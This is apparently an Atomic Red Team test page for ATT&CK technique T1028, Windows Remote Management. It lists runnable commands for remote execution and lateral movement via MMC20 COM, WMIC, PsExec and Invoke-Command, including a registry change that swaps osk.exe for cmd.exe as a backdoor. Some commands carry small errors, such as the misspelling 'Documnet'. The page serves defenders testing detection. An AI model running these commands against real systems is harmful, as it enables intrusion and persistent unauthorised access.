# T1028 - Windows Remote Management
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1028)
<blockquote>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the <code>winrm</code> command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)</blockquote>

## Atomic Tests

- [Atomic Test #1 - Enable Windows Remote Management](#atomic-test-1---enable-windows-remote-management)

- [Atomic Test #2 - PowerShell Lateral Movement](#atomic-test-2---powershell-lateral-movement)

- [Atomic Test #3 - WMIC Process Call Create](#atomic-test-3---wmic-process-call-create)

- [Atomic Test #4 - Psexec](#atomic-test-4---psexec)

- [Atomic Test #5 - Invoke-Command](#atomic-test-5---invoke-command)


<br/>

## Atomic Test #1 - Enable Windows Remote Management
Powershell Enable WinRM

Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.

**Supported Platforms:** Windows





#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
Enable-PSRemoting -Force
```






<br/>
<br/>

## Atomic Test #2 - PowerShell Lateral Movement
Powershell lateral movement using the mmc20 application com object.

Reference:

https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/

Upon successful execution, cmd will spawn calc.exe on a remote computer.

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| computer_name | Name of Computer | string | computer1|


#### Attack Commands: Run with `powershell`! 


```powershell
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```






<br/>
<br/>

## Atomic Test #3 - WMIC Process Call Create
Utilize WMIC to start remote process.

Upon successful execution, cmd will utilize wmic.exe to modify the registry on a remote endpoint to swap osk.exe with cmd.exe.

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN&#92;Administrator|
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|


#### Attack Commands: Run with `command_prompt`! 


```cmd
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
```






<br/>
<br/>

## Atomic Test #4 - Psexec
Utilize psexec to start remote process.

Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a remote system.

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN&#92;Administrator|
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | localhost|
| psexec_exe | Path to PsExec | string | C:&#92;PSTools&#92;PsExec.exe|


#### Attack Commands: Run with `command_prompt`! 


```cmd
#{psexec_exe} \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe
```




#### Dependencies:  Run with `command_prompt`!
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```cmd
if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1} 
```
##### Get Prereq Commands:
```cmd
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null
Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
```




<br/>
<br/>

## Atomic Test #5 - Invoke-Command
Execute Invoke-command on remote host.

Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| host_name | Remote Windows Host Name | String | localhost|
| remote_command | Command to execute on remote Host | String | ipconfig|


#### Attack Commands: Run with `powershell`! 


```powershell
invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
```






<br/>
